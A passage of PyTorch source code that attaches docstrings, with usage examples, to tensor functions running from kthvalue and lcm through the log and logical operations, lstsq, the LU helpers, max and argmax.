other (Tensor)
Keyword args:
out (Tensor, optional): The output tensor. Ignored if ``None``. Default: ``None``
Examples::
>>> mat1 = torch.eye(2)
>>> mat2 = torch.ones(2, 2)
>>> torch.kron(mat1, mat2)
tensor([[1., 1., 0., 0.],
[1., 1., 0., 0.],
[0., 0., 1., 1.],
[0., 0., 1., 1.]])
>>> mat1 = torch.eye(2)
>>> mat2 = torch.arange(1, 5).reshape(2, 2)
>>> torch.kron(mat1, mat2)
tensor([[1., 2., 0., 0.],
[3., 4., 0., 0.],
[0., 0., 1., 2.],
[0., 0., 3., 4.]])
""")
add_docstr(torch.kthvalue,
r"""
kthvalue(input, k, dim=None, keepdim=False, *, out=None) -> (Tensor, LongTensor)
Returns a namedtuple ``(values, indices)`` where ``values`` is the :attr:`k` th
smallest element of each row of the :attr:`input` tensor in the given dimension
:attr:`dim`. And ``indices`` is the index location of each element found.
If :attr:`dim` is not given, the last dimension of the `input` is chosen.
If :attr:`keepdim` is ``True``, both the :attr:`values` and :attr:`indices` tensors
are the same size as :attr:`input`, except in the dimension :attr:`dim` where
they are of size 1. Otherwise, :attr:`dim` is squeezed
(see :func:`torch.squeeze`), resulting in both the :attr:`values` and
:attr:`indices` tensors having 1 fewer dimension than the :attr:`input` tensor.
.. note::
When :attr:`input` is a CUDA tensor and there are multiple valid
:attr:`k` th values, this function may nondeterministically return
:attr:`indices` for any of them.
Args:
{input}
k (int): k for the k-th smallest element
dim (int, optional): the dimension to find the kth value along
{keepdim}
Keyword args:
out (tuple, optional): the output tuple of (Tensor, LongTensor)
can be optionally given to be used as output buffers
Example::
>>> x = torch.arange(1., 6.)
>>> x
tensor([ 1., 2., 3., 4., 5.])
>>> torch.kthvalue(x, 4)
torch.return_types.kthvalue(values=tensor(4.), indices=tensor(3))
>>> x=torch.arange(1.,7.).resize_(2,3)
>>> x
tensor([[ 1., 2., 3.],
[ 4., 5., 6.]])
>>> torch.kthvalue(x, 2, 0, True)
torch.return_types.kthvalue(values=tensor([[4., 5., 6.]]), indices=tensor([[1, 1, 1]]))
""".format(**single_dim_common))
add_docstr(torch.lcm,
r"""
lcm(input, other, *, out=None) -> Tensor
Computes the element-wise least common multiple (LCM) of :attr:`input` and :attr:`other`.
Both :attr:`input` and :attr:`other` must have integer types.
.. note::
This defines :math:`lcm(0, 0) = 0` and :math:`lcm(0, a) = 0`.
Args:
{input}
other (Tensor): the second input tensor
Keyword arguments:
{out}
Example::
>>> a = torch.tensor([5, 10, 15])
>>> b = torch.tensor([3, 4, 5])
>>> torch.lcm(a, b)
tensor([15, 20, 15])
>>> c = torch.tensor([3])
>>> torch.lcm(a, c)
tensor([15, 30, 15])
""".format(**common_args))
add_docstr(torch.ldexp, r"""
ldexp(input, other, *, out=None) -> Tensor
Multiplies :attr:`input` by 2**:attr:`other`.
.. math::
\text{{out}}_i = \text{{input}}_i * 2^\text{{other}}_i
""" + r"""
Typically this function is used to construct floating point numbers by multiplying
mantissas in :attr:`input` with integral powers of two created from the exponents
in :attr:`other`.
Args:
{input}
other (Tensor): a tensor of exponents, typically integers.
Keyword args:
{out}
Example::
>>> torch.ldexp(torch.tensor([1.]), torch.tensor([1]))
tensor([2.])
>>> torch.ldexp(torch.tensor([1.0]), torch.tensor([1, 2, 3, 4]))
tensor([ 2., 4., 8., 16.])
""".format(**common_args))
add_docstr(torch.le, r"""
le(input, other, *, out=None) -> Tensor
Computes :math:`\text{input} \leq \text{other}` element-wise.
""" + r"""
The second argument can be a number or a tensor whose shape is
:ref:`broadcastable <broadcasting-semantics>` with the first argument.
Args:
input (Tensor): the tensor to compare
other (Tensor or Scalar): the tensor or value to compare
Keyword args:
{out}
Returns:
A boolean tensor that is True where :attr:`input` is less than or equal to
:attr:`other` and False elsewhere
Example::
>>> torch.le(torch.tensor([[1, 2], [3, 4]]), torch.tensor([[1, 1], [4, 4]]))
tensor([[True, False], [True, True]])
""".format(**common_args))
add_docstr(torch.less_equal, r"""
less_equal(input, other, *, out=None) -> Tensor
Alias for :func:`torch.le`.
""")
add_docstr(torch.lerp,
r"""
lerp(input, end, weight, *, out=None)
Does a linear interpolation of two tensors :attr:`start` (given by :attr:`input`) and :attr:`end` based
on a scalar or tensor :attr:`weight` and returns the resulting :attr:`out` tensor.
.. math::
\text{out}_i = \text{start}_i + \text{weight}_i \times (\text{end}_i - \text{start}_i)
""" + r"""
The shapes of :attr:`start` and :attr:`end` must be
:ref:`broadcastable <broadcasting-semantics>`. If :attr:`weight` is a tensor, then
the shapes of :attr:`weight`, :attr:`start`, and :attr:`end` must be :ref:`broadcastable <broadcasting-semantics>`.
Args:
input (Tensor): the tensor with the starting points
end (Tensor): the tensor with the ending points
weight (float or tensor): the weight for the interpolation formula
Keyword args:
{out}
Example::
>>> start = torch.arange(1., 5.)
>>> end = torch.empty(4).fill_(10)
>>> start
tensor([ 1., 2., 3., 4.])
>>> end
tensor([ 10., 10., 10., 10.])
>>> torch.lerp(start, end, 0.5)
tensor([ 5.5000, 6.0000, 6.5000, 7.0000])
>>> torch.lerp(start, end, torch.full_like(start, 0.5))
tensor([ 5.5000, 6.0000, 6.5000, 7.0000])
""".format(**common_args))
add_docstr(torch.lgamma,
r"""
lgamma(input, *, out=None) -> Tensor
Computes the natural logarithm of the absolute value of the gamma function on :attr:`input`.
.. math::
\text{out}_{i} = \ln \Gamma(|\text{input}_{i}|)
""" + """
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.arange(0.5, 2, 0.5)
>>> torch.lgamma(a)
tensor([ 0.5724, 0.0000, -0.1208])
""".format(**common_args))
add_docstr(torch.linspace, r"""
linspace(start, end, steps, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Creates a one-dimensional tensor of size :attr:`steps` whose values are evenly
spaced from :attr:`start` to :attr:`end`, inclusive. That is, the value are:
.. math::
(\text{start},
\text{start} + \frac{\text{end} - \text{start}}{\text{steps} - 1},
\ldots,
\text{start} + (\text{steps} - 2) * \frac{\text{end} - \text{start}}{\text{steps} - 1},
\text{end})
""" + """
.. warning::
Not providing a value for :attr:`steps` is deprecated. For backwards
compatibility, not providing a value for :attr:`steps` will create a tensor
with 100 elements. Note that this behavior is not reflected in the
documented function signature and should not be relied on. In a future
PyTorch release, failing to provide a value for :attr:`steps` will throw a
runtime error.
Args:
start (float): the starting value for the set of points
end (float): the ending value for the set of points
steps (int): size of the constructed tensor
Keyword arguments:
{out}
dtype (torch.dtype, optional): the data type to perform the computation in.
Default: if None, uses the global default dtype (see torch.get_default_dtype())
when both :attr:`start` and :attr:`end` are real,
and corresponding complex dtype when either is complex.
{layout}
{device}
{requires_grad}
Example::
>>> torch.linspace(3, 10, steps=5)
tensor([ 3.0000, 4.7500, 6.5000, 8.2500, 10.0000])
>>> torch.linspace(-10, 10, steps=5)
tensor([-10., -5., 0., 5., 10.])
>>> torch.linspace(start=-10, end=10, steps=5)
tensor([-10., -5., 0., 5., 10.])
>>> torch.linspace(start=-10, end=10, steps=1)
tensor([-10.])
""".format(**factory_common_args))
add_docstr(torch.log,
r"""
log(input, *, out=None) -> Tensor
Returns a new tensor with the natural logarithm of the elements
of :attr:`input`.
.. math::
y_{i} = \log_{e} (x_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(5)
>>> a
tensor([-0.7168, -0.5471, -0.8933, -1.4428, -0.1190])
>>> torch.log(a)
tensor([ nan, nan, nan, nan, nan])
""".format(**common_args))
add_docstr(torch.log10,
r"""
log10(input, *, out=None) -> Tensor
Returns a new tensor with the logarithm to the base 10 of the elements
of :attr:`input`.
.. math::
y_{i} = \log_{10} (x_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.rand(5)
>>> a
tensor([ 0.5224, 0.9354, 0.7257, 0.1301, 0.2251])
>>> torch.log10(a)
tensor([-0.2820, -0.0290, -0.1392, -0.8857, -0.6476])
""".format(**common_args))
add_docstr(torch.log1p,
r"""
log1p(input, *, out=None) -> Tensor
Returns a new tensor with the natural logarithm of (1 + :attr:`input`).
.. math::
y_i = \log_{e} (x_i + 1)
""" + r"""
.. note:: This function is more accurate than :func:`torch.log` for small
values of :attr:`input`
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(5)
>>> a
tensor([-1.0090, -0.9923, 1.0249, -0.5372, 0.2492])
>>> torch.log1p(a)
tensor([ nan, -4.8653, 0.7055, -0.7705, 0.2225])
""".format(**common_args))
add_docstr(torch.log2,
r"""
log2(input, *, out=None) -> Tensor
Returns a new tensor with the logarithm to the base 2 of the elements
of :attr:`input`.
.. math::
y_{i} = \log_{2} (x_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.rand(5)
>>> a
tensor([ 0.8419, 0.8003, 0.9971, 0.5287, 0.0490])
>>> torch.log2(a)
tensor([-0.2483, -0.3213, -0.0042, -0.9196, -4.3504])
""".format(**common_args))
add_docstr(torch.logaddexp,
r"""
logaddexp(input, other, *, out=None) -> Tensor
Logarithm of the sum of exponentiations of the inputs.
Calculates pointwise :math:`\log\left(e^x + e^y\right)`. This function is useful
in statistics where the calculated probabilities of events may be so small as to
exceed the range of normal floating point numbers. In such cases the logarithm
of the calculated probability is stored. This function allows adding
probabilities stored in such a fashion.
This op should be disambiguated with :func:`torch.logsumexp` which performs a
reduction on a single tensor.
Args:
{input}
other (Tensor): the second input tensor
Keyword arguments:
{out}
Example::
>>> torch.logaddexp(torch.tensor([-1.0]), torch.tensor([-1.0, -2, -3]))
tensor([-0.3069, -0.6867, -0.8731])
>>> torch.logaddexp(torch.tensor([-100.0, -200, -300]), torch.tensor([-1.0, -2, -3]))
tensor([-1., -2., -3.])
>>> torch.logaddexp(torch.tensor([1.0, 2000, 30000]), torch.tensor([-1.0, -2, -3]))
tensor([1.1269e+00, 2.0000e+03, 3.0000e+04])
""".format(**common_args))
add_docstr(torch.logaddexp2,
r"""
logaddexp2(input, other, *, out=None) -> Tensor
Logarithm of the sum of exponentiations of the inputs in base-2.
Calculates pointwise :math:`\log_2\left(2^x + 2^y\right)`. See
:func:`torch.logaddexp` for more details.
Args:
{input}
other (Tensor): the second input tensor
Keyword arguments:
{out}
""".format(**common_args))
add_docstr(torch.xlogy,
r"""
xlogy(input, other, *, out=None) -> Tensor
Alias for :func:`torch.special.xlogy`.
""")
add_docstr(torch.logical_and,
r"""
logical_and(input, other, *, out=None) -> Tensor
Computes the element-wise logical AND of the given input tensors. Zeros are treated as ``False`` and nonzeros are
treated as ``True``.
Args:
{input}
other (Tensor): the tensor to compute AND with
Keyword args:
{out}
Example::
>>> torch.logical_and(torch.tensor([True, False, True]), torch.tensor([True, False, False]))
tensor([ True, False, False])
>>> a = torch.tensor([0, 1, 10, 0], dtype=torch.int8)
>>> b = torch.tensor([4, 0, 1, 0], dtype=torch.int8)
>>> torch.logical_and(a, b)
tensor([False, False, True, False])
>>> torch.logical_and(a.double(), b.double())
tensor([False, False, True, False])
>>> torch.logical_and(a.double(), b)
tensor([False, False, True, False])
>>> torch.logical_and(a, b, out=torch.empty(4, dtype=torch.bool))
tensor([False, False, True, False])
""".format(**common_args))
add_docstr(torch.logical_not,
r"""
logical_not(input, *, out=None) -> Tensor
Computes the element-wise logical NOT of the given input tensor. If not specified, the output tensor will have the bool
dtype. If the input tensor is not a bool tensor, zeros are treated as ``False`` and non-zeros are treated as ``True``.
Args:
{input}
Keyword args:
{out}
Example::
>>> torch.logical_not(torch.tensor([True, False]))
tensor([False, True])
>>> torch.logical_not(torch.tensor([0, 1, -10], dtype=torch.int8))
tensor([ True, False, False])
>>> torch.logical_not(torch.tensor([0., 1.5, -10.], dtype=torch.double))
tensor([ True, False, False])
>>> torch.logical_not(torch.tensor([0., 1., -10.], dtype=torch.double), out=torch.empty(3, dtype=torch.int16))
tensor([1, 0, 0], dtype=torch.int16)
""".format(**common_args))
add_docstr(torch.logical_or,
r"""
logical_or(input, other, *, out=None) -> Tensor
Computes the element-wise logical OR of the given input tensors. Zeros are treated as ``False`` and nonzeros are
treated as ``True``.
Args:
{input}
other (Tensor): the tensor to compute OR with
Keyword args:
{out}
Example::
>>> torch.logical_or(torch.tensor([True, False, True]), torch.tensor([True, False, False]))
tensor([ True, False, True])
>>> a = torch.tensor([0, 1, 10, 0], dtype=torch.int8)
>>> b = torch.tensor([4, 0, 1, 0], dtype=torch.int8)
>>> torch.logical_or(a, b)
tensor([ True, True, True, False])
>>> torch.logical_or(a.double(), b.double())
tensor([ True, True, True, False])
>>> torch.logical_or(a.double(), b)
tensor([ True, True, True, False])
>>> torch.logical_or(a, b, out=torch.empty(4, dtype=torch.bool))
tensor([ True, True, True, False])
""".format(**common_args))
add_docstr(torch.logical_xor,
r"""
logical_xor(input, other, *, out=None) -> Tensor
Computes the element-wise logical XOR of the given input tensors. Zeros are treated as ``False`` and nonzeros are
treated as ``True``.
Args:
{input}
other (Tensor): the tensor to compute XOR with
Keyword args:
{out}
Example::
>>> torch.logical_xor(torch.tensor([True, False, True]), torch.tensor([True, False, False]))
tensor([False, False, True])
>>> a = torch.tensor([0, 1, 10, 0], dtype=torch.int8)
>>> b = torch.tensor([4, 0, 1, 0], dtype=torch.int8)
>>> torch.logical_xor(a, b)
tensor([ True, True, False, False])
>>> torch.logical_xor(a.double(), b.double())
tensor([ True, True, False, False])
>>> torch.logical_xor(a.double(), b)
tensor([ True, True, False, False])
>>> torch.logical_xor(a, b, out=torch.empty(4, dtype=torch.bool))
tensor([ True, True, False, False])
""".format(**common_args))
add_docstr(torch.logspace, """
logspace(start, end, steps, base=10.0, *, \
out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
""" + r"""
Creates a one-dimensional tensor of size :attr:`steps` whose values are evenly
spaced from :math:`{{\text{{base}}}}^{{\text{{start}}}}` to
:math:`{{\text{{base}}}}^{{\text{{end}}}}`, inclusive, on a logarithmic scale
with base :attr:`base`. That is, the values are:
.. math::
(\text{base}^{\text{start}},
\text{base}^{(\text{start} + \frac{\text{end} - \text{start}}{ \text{steps} - 1})},
\ldots,
\text{base}^{(\text{start} + (\text{steps} - 2) * \frac{\text{end} - \text{start}}{ \text{steps} - 1})},
\text{base}^{\text{end}})
""" + """
.. warning::
Not providing a value for :attr:`steps` is deprecated. For backwards
compatibility, not providing a value for :attr:`steps` will create a tensor
with 100 elements. Note that this behavior is not reflected in the
documented function signature and should not be relied on. In a future
PyTorch release, failing to provide a value for :attr:`steps` will throw a
runtime error.
Args:
start (float): the starting value for the set of points
end (float): the ending value for the set of points
steps (int): size of the constructed tensor
base (float, optional): base of the logarithm function. Default: ``10.0``.
Keyword arguments:
{out}
dtype (torch.dtype, optional): the data type to perform the computation in.
Default: if None, uses the global default dtype (see torch.get_default_dtype())
when both :attr:`start` and :attr:`end` are real,
and corresponding complex dtype when either is complex.
{layout}
{device}
{requires_grad}
Example::
>>> torch.logspace(start=-10, end=10, steps=5)
tensor([ 1.0000e-10, 1.0000e-05, 1.0000e+00, 1.0000e+05, 1.0000e+10])
>>> torch.logspace(start=0.1, end=1.0, steps=5)
tensor([ 1.2589, 2.1135, 3.5481, 5.9566, 10.0000])
>>> torch.logspace(start=0.1, end=1.0, steps=1)
tensor([1.2589])
>>> torch.logspace(start=2, end=2, steps=1, base=2)
tensor([4.0])
""".format(**factory_common_args))
add_docstr(torch.logsumexp,
r"""
logsumexp(input, dim, keepdim=False, *, out=None)
Returns the log of summed exponentials of each row of the :attr:`input`
tensor in the given dimension :attr:`dim`. The computation is numerically
stabilized.
For summation index :math:`j` given by `dim` and other indices :math:`i`, the result is
.. math::
\text{{logsumexp}}(x)_{{i}} = \log \sum_j \exp(x_{{ij}})
{keepdim_details}
Args:
{input}
{dim}
{keepdim}
Keyword args:
{out}
Example::
>>> a = torch.randn(3, 3)
>>> torch.logsumexp(a, 1)
tensor([1.4907, 1.0593, 1.5696])
>>> torch.dist(torch.logsumexp(a, 1), torch.log(torch.sum(torch.exp(a), 1)))
tensor(1.6859e-07)
""".format(**multi_dim_common))
add_docstr(torch.lstsq,
r"""
lstsq(input, A, *, out=None) -> (Tensor, Tensor)
Computes the solution to the least squares and least norm problems for a full
rank matrix :math:`A` of size :math:`(m \times n)` and a matrix :math:`B` of
size :math:`(m \times k)`.
If :math:`m \geq n`, :func:`lstsq` solves the least-squares problem:
.. math::
\begin{array}{ll}
\min_X & \|AX-B\|_2.
\end{array}
If :math:`m < n`, :func:`lstsq` solves the least-norm problem:
.. math::
\begin{array}{llll}
\min_X & \|X\|_2 & \text{subject to} & AX = B.
\end{array}
Returned tensor :math:`X` has shape :math:`(\max(m, n) \times k)`. The first :math:`n`
rows of :math:`X` contains the solution. If :math:`m \geq n`, the residual sum of squares
for the solution in each column is given by the sum of squares of elements in the
remaining :math:`m - n` rows of that column.
.. warning::
:func:`torch.lstsq` is deprecated in favor of :func:`torch.linalg.lstsq`
and will be removed in a future PyTorch release. :func:`torch.linalg.lstsq`
has reversed arguments and does not return the QR decomposition in the returned tuple,
(it returns other information about the problem).
The returned `solution` in :func:`torch.lstsq` stores the residuals of the solution in the
last `m - n` columns in the case `m > n`. In :func:`torch.linalg.lstsq`, the residuals
are in the field 'residuals' of the returned named tuple.
Unpacking the solution as ``X = torch.lstsq(B, A).solution[:A.size(1)]`` should be replaced with
.. code:: python
X = torch.linalg.lstsq(A, B).solution
.. note::
The case when :math:`m < n` is not supported on the GPU.
Args:
input (Tensor): the matrix :math:`B`
A (Tensor): the :math:`m` by :math:`n` matrix :math:`A`
Keyword args:
out (tuple, optional): the optional destination tensor
Returns:
(Tensor, Tensor): A namedtuple (solution, QR) containing:
- **solution** (*Tensor*): the least squares solution
- **QR** (*Tensor*): the details of the QR factorization
.. note::
The returned matrices will always be transposed, irrespective of the strides
of the input matrices. That is, they will have stride `(1, m)` instead of
`(m, 1)`.
Example::
>>> A = torch.tensor([[1., 1, 1],
... [2, 3, 4],
... [3, 5, 2],
... [4, 2, 5],
... [5, 4, 3]])
>>> B = torch.tensor([[-10., -3],
... [ 12, 14],
... [ 14, 12],
... [ 16, 16],
... [ 18, 16]])
>>> X, _ = torch.lstsq(B, A)
>>> X
tensor([[ 2.0000, 1.0000],
[ 1.0000, 1.0000],
[ 1.0000, 2.0000],
[ 10.9635, 4.8501],
[ 8.9332, 5.2418]])
""")
add_docstr(torch.lt, r"""
lt(input, other, *, out=None) -> Tensor
Computes :math:`\text{input} < \text{other}` element-wise.
""" + r"""
The second argument can be a number or a tensor whose shape is
:ref:`broadcastable <broadcasting-semantics>` with the first argument.
Args:
input (Tensor): the tensor to compare
other (Tensor or float): the tensor or value to compare
Keyword args:
{out}
Returns:
A boolean tensor that is True where :attr:`input` is less than :attr:`other` and False elsewhere
Example::
>>> torch.lt(torch.tensor([[1, 2], [3, 4]]), torch.tensor([[1, 1], [4, 4]]))
tensor([[False, False], [True, False]])
""".format(**common_args))
add_docstr(torch.lu_unpack, r"""
lu_unpack(LU_data, LU_pivots, unpack_data=True, unpack_pivots=True, *, out=None) -> (Tensor, Tensor, Tensor)
Unpacks the data and pivots from a LU factorization of a tensor into tensors ``L`` and ``U`` and a permutation tensor ``P``
such that ``LU_data, LU_pivots = (P @ L @ U).lu()``.
Returns a tuple of tensors as ``(the P tensor (permutation matrix), the L tensor, the U tensor)``.
.. note:: ``P.dtype == LU_data.dtype`` and ``P.dtype`` is not an integer type so that matrix products with ``P``
are possible without casting it to a floating type.
Args:
LU_data (Tensor): the packed LU factorization data
LU_pivots (Tensor): the packed LU factorization pivots
unpack_data (bool): flag indicating if the data should be unpacked.
If ``False``, then the returned ``L`` and ``U`` are ``None``.
Default: ``True``
unpack_pivots (bool): flag indicating if the pivots should be unpacked into a permutation matrix ``P``.
If ``False``, then the returned ``P`` is ``None``.
Default: ``True``
out (tuple, optional): a tuple of three tensors to use for the outputs ``(P, L, U)``.
Examples::
>>> A = torch.randn(2, 3, 3)
>>> A_LU, pivots = A.lu()
>>> P, A_L, A_U = torch.lu_unpack(A_LU, pivots)
>>>
>>> # can recover A from factorization
>>> A_ = torch.bmm(P, torch.bmm(A_L, A_U))
>>> # LU factorization of a rectangular matrix:
>>> A = torch.randn(2, 3, 2)
>>> A_LU, pivots = A.lu()
>>> P, A_L, A_U = torch.lu_unpack(A_LU, pivots)
>>> P
tensor([[[1., 0., 0.],
[0., 1., 0.],
[0., 0., 1.]],
[[0., 0., 1.],
[0., 1., 0.],
[1., 0., 0.]]])
>>> A_L
tensor([[[ 1.0000, 0.0000],
[ 0.4763, 1.0000],
[ 0.3683, 0.1135]],
[[ 1.0000, 0.0000],
[ 0.2957, 1.0000],
[-0.9668, -0.3335]]])
>>> A_U
tensor([[[ 2.1962, 1.0881],
[ 0.0000, -0.8681]],
[[-1.0947, 0.3736],
[ 0.0000, 0.5718]]])
>>> A_ = torch.bmm(P, torch.bmm(A_L, A_U))
>>> torch.norm(A_ - A)
tensor(2.9802e-08)
""".format(**common_args))
add_docstr(torch.less, r"""
less(input, other, *, out=None) -> Tensor
Alias for :func:`torch.lt`.
""")
add_docstr(torch.lu_solve,
r"""
lu_solve(b, LU_data, LU_pivots, *, out=None) -> Tensor
Returns the LU solve of the linear system :math:`Ax = b` using the partially pivoted
LU factorization of A from :meth:`torch.lu`.
This function supports ``float``, ``double``, ``cfloat`` and ``cdouble`` dtypes for :attr:`input`.
Arguments:
b (Tensor): the RHS tensor of size :math:`(*, m, k)`, where :math:`*`
is zero or more batch dimensions.
LU_data (Tensor): the pivoted LU factorization of A from :meth:`torch.lu` of size :math:`(*, m, m)`,
where :math:`*` is zero or more batch dimensions.
LU_pivots (IntTensor): the pivots of the LU factorization from :meth:`torch.lu` of size :math:`(*, m)`,
where :math:`*` is zero or more batch dimensions.
The batch dimensions of :attr:`LU_pivots` must be equal to the batch dimensions of
:attr:`LU_data`.
Keyword args:
{out}
Example::
>>> A = torch.randn(2, 3, 3)
>>> b = torch.randn(2, 3, 1)
>>> A_LU = torch.lu(A)
>>> x = torch.lu_solve(b, *A_LU)
>>> torch.norm(torch.bmm(A, x) - b)
tensor(1.00000e-07 *
2.8312)
""".format(**common_args))
add_docstr(torch.masked_select,
r"""
masked_select(input, mask, *, out=None) -> Tensor
Returns a new 1-D tensor which indexes the :attr:`input` tensor according to
the boolean mask :attr:`mask` which is a `BoolTensor`.
The shapes of the :attr:`mask` tensor and the :attr:`input` tensor don't need
to match, but they must be :ref:`broadcastable <broadcasting-semantics>`.
.. note:: The returned tensor does **not** use the same storage
as the original tensor
Args:
{input}
mask (BoolTensor): the tensor containing the binary mask to index with
Keyword args:
{out}
Example::
>>> x = torch.randn(3, 4)
>>> x
tensor([[ 0.3552, -2.3825, -0.8297, 0.3477],
[-1.2035, 1.2252, 0.5002, 0.6248],
[ 0.1307, -2.0608, 0.1244, 2.0139]])
>>> mask = x.ge(0.5)
>>> mask
tensor([[False, False, False, False],
[False, True, True, True],
[False, False, False, True]])
>>> torch.masked_select(x, mask)
tensor([ 1.2252, 0.5002, 0.6248, 2.0139])
""".format(**common_args))
add_docstr(torch.matrix_rank, r"""
matrix_rank(input, tol=None, symmetric=False, *, out=None) -> Tensor
Returns the numerical rank of a 2-D tensor. The method to compute the
matrix rank is done using SVD by default. If :attr:`symmetric` is ``True``,
then :attr:`input` is assumed to be symmetric, and the computation of the
rank is done by obtaining the eigenvalues.
:attr:`tol` is the threshold below which the singular values (or the eigenvalues
when :attr:`symmetric` is ``True``) are considered to be 0. If :attr:`tol` is not
specified, :attr:`tol` is set to ``S.max() * max(S.size()) * eps`` where `S` is the
singular values (or the eigenvalues when :attr:`symmetric` is ``True``), and ``eps``
is the epsilon value for the datatype of :attr:`input`.
.. warning::
:func:`torch.matrix_rank` is deprecated in favor of :func:`torch.linalg.matrix_rank`
and will be removed in a future PyTorch release. The parameter :attr:`symmetric` was
renamed in :func:`torch.linalg.matrix_rank` to :attr:`hermitian`.
Args:
input (Tensor): the input 2-D tensor
tol (float, optional): the tolerance value. Default: ``None``
symmetric(bool, optional): indicates whether :attr:`input` is symmetric.
Default: ``False``
Keyword args:
{out}
Example::
>>> a = torch.eye(10)
>>> torch.matrix_rank(a)
tensor(10)
>>> b = torch.eye(10)
>>> b[0, 0] = 0
>>> torch.matrix_rank(b)
tensor(9)
""".format(**common_args))
add_docstr(torch.matrix_power, r"""
matrix_power(input, n, *, out=None) -> Tensor
Alias for :func:`torch.linalg.matrix_power`
""")
add_docstr(torch.matrix_exp, r"""
matrix_exp(A) -> Tensor
Alias for :func:`torch.linalg.matrix_exp`.
""")
add_docstr(torch.max,
r"""
max(input) -> Tensor
Returns the maximum value of all elements in the ``input`` tensor.
.. warning::
This function produces deterministic (sub)gradients unlike ``max(dim=0)``
Args:
{input}
Example::
>>> a = torch.randn(1, 3)
>>> a
tensor([[ 0.6763, 0.7445, -2.2369]])
>>> torch.max(a)
tensor(0.7445)
.. function:: max(input, dim, keepdim=False, *, out=None) -> (Tensor, LongTensor)
:noindex:
Returns a namedtuple ``(values, indices)`` where ``values`` is the maximum
value of each row of the :attr:`input` tensor in the given dimension
:attr:`dim`. And ``indices`` is the index location of each maximum value found
(argmax).
If ``keepdim`` is ``True``, the output tensors are of the same size
as ``input`` except in the dimension ``dim`` where they are of size 1.
Otherwise, ``dim`` is squeezed (see :func:`torch.squeeze`), resulting
in the output tensors having 1 fewer dimension than ``input``.
.. note:: If there are multiple maximal values in a reduced row then
the indices of the first maximal value are returned.
Args:
{input}
{dim}
{keepdim} Default: ``False``.
Keyword args:
out (tuple, optional): the result tuple of two output tensors (max, max_indices)
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[-1.2360, -0.2942, -0.1222, 0.8475],
[ 1.1949, -1.1127, -2.2379, -0.6702],
[ 1.5717, -0.9207, 0.1297, -1.8768],
[-0.6172, 1.0036, -0.6060, -0.2432]])
>>> torch.max(a, 1)
torch.return_types.max(values=tensor([0.8475, 1.1949, 1.5717, 1.0036]), indices=tensor([3, 0, 0, 1]))
.. function:: max(input, other, *, out=None) -> Tensor
:noindex:
See :func:`torch.maximum`.
""".format(**single_dim_common))
add_docstr(torch.maximum, r"""
maximum(input, other, *, out=None) -> Tensor
Computes the element-wise maximum of :attr:`input` and :attr:`other`.
.. note::
If one of the elements being compared is a NaN, then that element is returned.
:func:`maximum` is not supported for tensors with complex dtypes.
Args:
{input}
other (Tensor): the second input tensor
Keyword args:
{out}
Example::
>>> a = torch.tensor((1, 2, -1))
>>> b = torch.tensor((3, 0, 4))
>>> torch.maximum(a, b)
tensor([3, 2, 4])
""".format(**common_args))
add_docstr(torch.fmax, r"""
fmax(input, other, *, out=None) -> Tensor
Computes the element-wise maximum of :attr:`input` and :attr:`other`.
This is like :func:`torch.maximum` except it handles NaNs differently:
if exactly one of the two elements being compared is a NaN then the non-NaN element is taken as the maximum.
Only if both elements are NaN is NaN propagated.
This function is a wrapper around C++'s ``std::fmax`` and is similar to NumPy's ``fmax`` function.
Supports :ref:`broadcasting to a common shape <broadcasting-semantics>`,
:ref:`type promotion <type-promotion-doc>`, and integer and floating-point inputs.
Args:
{input}
other (Tensor): the second input tensor
Keyword args:
{out}
Example::
>>> a = torch.tensor([9.7, float('nan'), 3.1, float('nan')])
>>> b = torch.tensor([-2.2, 0.5, float('nan'), float('nan')])
>>> torch.fmax(a, b)
tensor([9.7000, 0.5000, 3.1000, nan])
""".format(**common_args))
add_docstr(torch.amax,
r"""
amax(input, dim, keepdim=False, *, out=None) -> Tensor
Returns the maximum value of each slice of the :attr:`input` tensor in the given
dimension(s) :attr:`dim`.
.. note::
The difference between ``max``/``min`` and ``amax``/``amin`` is:
- ``amax``/``amin`` supports reducing on multiple dimensions,
- ``amax``/``amin`` does not return indices,
- ``amax``/``amin`` evenly distributes gradient between equal values,
while ``max(dim)``/``min(dim)`` propagates gradient only to a single
index in the source tensor.
{keepdim_details}
Args:
{input}
{dim}
{keepdim}
Keyword args:
{out}
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[ 0.8177, 1.4878, -0.2491, 0.9130],
[-0.7158, 1.1775, 2.0992, 0.4817],
[-0.0053, 0.0164, -1.3738, -0.0507],
[ 1.9700, 1.1106, -1.0318, -1.0816]])
>>> torch.amax(a, 1)
tensor([1.4878, 2.0992, 0.0164, 1.9700])
""".format(**multi_dim_common))
add_docstr(torch.argmax,
r"""
argmax(input) -> LongTensor
Returns the indices of the maximum value of all elements in the :attr:`input` tensor.
This is the second value returned by :meth:`torch.max`. See its
documentation for the exact semantics of this method.
.. note:: If there are multiple maximal values then the indices of the first maximal value are returned.
Args:
{input}
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[ 1.3398, 0.2663, -0.2686, 0.2450],
[-0.7401, -0.8805, -0.3402, -1.1936],
[ 0.4907, -1.3948, -1.0691, -0.3132],
[-1.6092, 0.5419, -0.2993, 0.3195]])
>>> torch.argmax(a)
tensor(0)
.. function:: argmax(input, dim, keepdim=False) -> LongTensor
:noindex:
Returns the indices of the maximum values of a tensor across a dimension.
This is the second value returned by :meth:`torch.max`. See its
documentation for the exact semantics of this method.
Args:
{input}
{dim} If ``None``, the argmax of the flattened input is returned.
{keepdim} Ignored if ``dim=None``.
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[ 1.3398, 0.2663, -0.2686, 0.2450],
[-0.7401, -0.8805, -0.3402, -1.1936],
[ 0.4907, -1.3948, -1.0691, -0.3132],
[-1.6092, 0.5419, -0.2993, 0.3195]])
>>> torch.argmax(a, dim=1)
tensor([ 0, 2, 0, 1])
""".format(**single_dim_common))
add_docstr(torch.argwhere,
r"""
argwhere(input) -> Tensor
Returns a tensor containing the indices of all non-zero elements of
:attr:`input`. Each row in the result contains the indices of a non-zero
